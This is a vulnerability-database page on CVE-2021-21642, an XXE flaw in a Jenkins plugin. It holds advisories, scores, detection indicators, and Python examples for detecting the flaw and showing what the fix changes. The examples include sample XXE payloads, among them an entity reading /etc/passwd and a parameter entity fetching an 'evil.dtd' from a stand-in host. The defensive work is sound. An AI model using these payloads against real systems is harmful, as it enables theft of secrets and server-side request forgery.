CVE-2021-21642
published 2021-04-21
CVE-2021-21642: Jenkins Config File Provider Plugin 3.7.0 and earlier does not configure its XML parser to prevent XML external entity (XXE) attacks.
Priority P2 · 61 · high · 8.1 (CVSS 3.1)
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:N
EPSS: 37.83% (98.4th percentile)
Affected (7 ranges)
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| jenkins | cloudbees_cd_plugin | — | — |
| jenkins | config_file_provider | <= 3.7.0 | 3.7.1 |
| jenkins | config_file_provider_plugin | — | — |
| jenkins | ids_in_config_file_provider_plugin | — | — |
| jenkins | script_security_plugin | — | — |
| jenkins | templating_engine_plugin | — | — |
| jenkins_project | jenkins_config_file_provider_plugin | unspecified – 3.7.0 | 3.7.1 |
Detection & IOCs (extracted from sources)
- An attacker must have the ability to define Maven configuration files in Jenkins to exploit this XXE vulnerability; monitor for unexpected or newly created Maven config files in the Config File Provider Plugin.
- The attack vector is a crafted XML configuration file containing external entity declarations; inspect Maven configuration files managed by the plugin for XXE payloads (e.g., DOCTYPE declarations with SYSTEM or PUBLIC entity references).
- Outbound DNS or HTTP requests originating from the Jenkins controller process may indicate XXE-based SSRF or secret exfiltration exploiting this vulnerability.
- Affected versions are Config File Provider Plugin 3.7.0 and earlier; the XML parser is not configured to prevent XXE attacks in these versions.
- No practical mitigation short of patching has been identified by Red Hat; upgrading the plugin is the only recommended remediation.
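The file-level indicators above can be triaged mechanically. The following Python scanner is an added example, not code from this page's sources or from the plugin: a legitimate Maven settings.xml has no reason to carry a DOCTYPE at all, so the scanner flags any DOCTYPE, an external DTD reference in its head, SYSTEM/PUBLIC entity declarations, parameter entities (`%name`), and body references to an externally declared entity. The four sample documents are constructed for the example; `203.0.113.7` is a documentation address, not a real indicator.

```python
"""Static triage of Config File Provider Maven settings for XXE payloads.

Added example for CVE-2021-21642; the sample documents below are constructed.
"""
import re
from typing import NamedTuple


class Finding(NamedTuple):
    kind: str    # doctype | external-dtd | external-entity | parameter-entity | entity-reference
    detail: str


# DOCTYPE head (root name, optional SYSTEM/PUBLIC external DTD) plus an optional
# internal subset in [...]. XML keywords are case-sensitive, so no re.I.
DOCTYPE_RE = re.compile(
    r"<!DOCTYPE\b(?P<head>[^\[>]*)(?:\[(?P<subset>.*?)\])?\s*>", re.S)

# <!ENTITY [%] name ( SYSTEM "uri" | PUBLIC "pubid" "uri" | "literal" )>
ENTITY_RE = re.compile(
    r"<!ENTITY\s+(?P<param>%\s*)?(?P<name>[^\s%>]+)\s+"
    r"(?:(?P<ext>SYSTEM|PUBLIC\s+(?P<pq>['\"])[^'\"]*(?P=pq))\s+)?"
    r"(?P<tq>['\"])(?P<target>[^'\"]*)(?P=tq)\s*>", re.S)


def scan_config(xml_text: str) -> list[Finding]:
    """Return XXE indicators found in one managed config file (empty = clean)."""
    findings: list[Finding] = []
    m = DOCTYPE_RE.search(xml_text)
    if not m:
        return findings                      # no DOCTYPE: nothing to declare entities with
    head = m.group("head").strip()
    subset = m.group("subset") or ""
    findings.append(Finding("doctype", head.split()[0] if head else "?"))
    if re.search(r"\b(?:SYSTEM|PUBLIC)\b", head):
        findings.append(Finding("external-dtd", head))   # whole DTD fetched from elsewhere
    external_names: set[str] = set()
    for e in ENTITY_RE.finditer(subset):
        name, target = e.group("name"), e.group("target")
        if e.group("param"):
            # parameter entities are the usual vehicle for out-of-band exfiltration
            findings.append(Finding("parameter-entity", f"%{name} -> {target}"))
        elif e.group("ext"):
            findings.append(Finding("external-entity", f"&{name}; -> {target}"))
            external_names.add(name)
    body = xml_text[m.end():]
    for ref in re.findall(r"&([^\s;&]+);", body):
        if ref in external_names:
            findings.append(Finding("entity-reference", f"&{ref}; used in document body"))
    return findings


def triage(configs: dict[str, str]) -> dict[str, list[Finding]]:
    """Scan every managed config; only files with findings are reported."""
    return {name: hits for name, text in configs.items() if (hits := scan_config(text))}


# Constructed samples: one benign settings.xml and three XXE variants.
BENIGN_SETTINGS = """<?xml version="1.0" encoding="UTF-8"?>
<settings xmlns="http://maven.apache.org/SETTINGS/1.0.0">
  <servers>
    <server><id>corp-nexus</id><username>ci-bot</username><password>example-token</password></server>
  </servers>
</settings>
"""

FILE_READ_SETTINGS = """<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE settings [
  <!ENTITY secret SYSTEM "file:///etc/passwd">
]>
<settings>
  <servers>
    <server><id>corp-nexus</id><username>ci-bot</username><password>&secret;</password></server>
  </servers>
</settings>
"""

OOB_SETTINGS = """<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE settings [
  <!ENTITY % remote SYSTEM "http://203.0.113.7/evil.dtd">
  %remote;
]>
<settings/>
"""

EXTERNAL_DTD_SETTINGS = """<!DOCTYPE settings SYSTEM "http://203.0.113.7/evil.dtd">
<settings/>
"""

SAMPLE_CONFIGS = {
    "maven-benign.xml": BENIGN_SETTINGS,
    "maven-file-read.xml": FILE_READ_SETTINGS,
    "maven-oob.xml": OOB_SETTINGS,
    "maven-external-dtd.xml": EXTERNAL_DTD_SETTINGS,
}

if __name__ == "__main__":
    for name, hits in triage(SAMPLE_CONFIGS).items():
        for hit in hits:
            print(f"{name}: {hit.kind}: {hit.detail}")
```

The scanner works on text, so it will not see a payload stored in an encoding it does not decode, and it only covers files the plugin actually manages; pair it with the outbound DNS/HTTP indicator above rather than relying on it alone.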
CVSS provenance
| Source | Version | Score | Severity | Vector |
|---|---|---|---|---|
| NVD | 3.1 | 8.1 | HIGH | CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:N |
| NVD | 2.0 | 5.5 | MEDIUM | AV:N/AC:L/Au:S/C:P/I:P/A:N |
| Red Hat (vendor) | — | 8.1 | HIGH | — |
GHSA
XML External Entity Reference vulnerability in Jenkins Config File Provider Plugin
ghsa · 2022-05-24 · HIGH · CWE-611
Jenkins Config File Provider Plugin 3.7.0 and earlier does not configure its XML parser to prevent XML external entity (XXE) attacks.
This allows attackers with the ability to define Maven configuration files to have Jenkins parse a crafted configuration file that uses external entities for extraction of secrets from the Jenkins controller or server-side request forgery.
Jenkins Config File Provider Plugin 3.7.1 disables external entity resolution for its XML parser.
OSV
XML External Entity Reference vulnerability in Jenkins Config File Provider Plugin
osv · 2022-05-24 · HIGH
Jenkins Config File Provider Plugin 3.7.0 and earlier does not configure its XML parser to prevent XML external entity (XXE) attacks.
This allows attackers with the ability to define Maven configuration files to have Jenkins parse a crafted configuration file that uses external entities for extraction of secrets from the Jenkins controller or server-side request forgery.
Jenkins Config File Provider Plugin 3.7.1 disables external entity resolution for its XML parser.
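To make concrete what "disables external entity resolution" changes, the following added example (not plugin code) parses one crafted settings.xml twice with Python's xml.sax, which stands in here for the plugin's Java parser: once with external general entities enabled, the vulnerable configuration, and once with them disabled, which is the behaviour 3.7.1 adopts. The "secret" is a temporary file the example writes itself; its name and the `hunter2` content are constructed.

```python
"""External entity resolution on and off: the setting the 3.7.1 fix changes.

Added example for CVE-2021-21642. Python's xml.sax stands in for the plugin's
Java XML parser; the crafted settings.xml and the secret file are constructed.
"""
import io
import tempfile
import xml.sax
from pathlib import Path
from xml.sax.handler import ContentHandler, feature_external_ges


class PasswordCollector(ContentHandler):
    """Collects the text of every <password> element, the place a Maven
    settings.xml would carry the value an attacker's entity expands into."""

    def __init__(self) -> None:
        super().__init__()
        self.passwords: list[str] = []
        self._in_password = False
        self._buf: list[str] = []

    def startElement(self, name, attrs):
        if name == "password":
            self._in_password, self._buf = True, []

    def characters(self, content):
        if self._in_password:
            self._buf.append(content)

    def endElement(self, name):
        if name == "password":
            self.passwords.append("".join(self._buf))
            self._in_password = False


def parse_settings(xml_text: str, resolve_external_entities: bool) -> list[str]:
    """Parse a settings document and return the <password> values it yields."""
    handler = PasswordCollector()
    parser = xml.sax.make_parser()
    # This one feature is the whole difference between the vulnerable parser
    # (external general entities fetched and inlined) and the fixed one.
    parser.setFeature(feature_external_ges, resolve_external_entities)
    parser.setContentHandler(handler)
    parser.parse(io.StringIO(xml_text))
    return handler.passwords


def crafted_settings(secret_uri: str) -> str:
    """A settings.xml whose password is an external entity pointing at secret_uri."""
    return f"""<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE settings [
  <!ENTITY secret SYSTEM "{secret_uri}">
]>
<settings>
  <servers>
    <server><id>corp-nexus</id><username>ci-bot</username><password>&secret;</password></server>
  </servers>
</settings>
"""


def demo() -> dict[str, list[str]]:
    """Parse the same crafted file with both parser configurations."""
    with tempfile.TemporaryDirectory() as tmp:
        secret_file = Path(tmp) / "controller-secret.txt"   # stand-in for a controller secret
        secret_file.write_text("hunter2")
        xml_text = crafted_settings(secret_file.as_uri())
        return {
            "vulnerable": parse_settings(xml_text, resolve_external_entities=True),
            "fixed": parse_settings(xml_text, resolve_external_entities=False),
        }


if __name__ == "__main__":
    for mode, passwords in demo().items():
        print(f"{mode}: {passwords!r}")
```

With resolution enabled the file's content lands in the parsed document exactly where the attacker placed the entity reference; with it disabled the reference expands to nothing and the document still parses, which is why the fix costs legitimate configs nothing. The advisories on this page state only that 3.7.1 disables external entity resolution in the plugin's parser; the Java factory settings it uses are not quoted here.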
Jenkins
Jenkins Security Advisory 2021-04-21
vendor_jenkins · 2021-04-21 · CVSS 8.1 · HIGH
This advisory announces vulnerabilities in the following Jenkins deliverables:
- CloudBees CD Plugin
- Config File Provider Plugin
- Templating Engine Plugin
Descriptions
XXE vulnerability in Config File Provider Plugin
SECURITY-2204 / CVE-2021-21642
Severity
Red Hat
jenkins-2-plugins/config-file-provider: Does not configure its XML parser to prevent XML external entity (XXE) attacks.
vendor_redhat · 2021-04-21 · CVSS 8.1 · HIGH · CWE-611
Jenkins Config File Provider Plugin 3.7.0 and earlier does not configure its XML parser to prevent XML external entity (XXE) attacks.
A flaw was found in the config-file-provider Jenkins plugin. The plugin's XML parser was not configured to prevent XML external entity (XXE) attacks. An attacker with the ability to define Maven configuration files can use this vulnerability to prepare a crafted configuration file that uses external entities for extraction of secrets from the Jenkins controller or server-side request forgery.
Mitigation: Red Hat has investigated whether a possible mitigation exists for this issue, and has not been able to identify a practical example. Please
No detection rules found.
No public exploits indexed.
No writeups or analysis indexed.
Published: 2021-04-21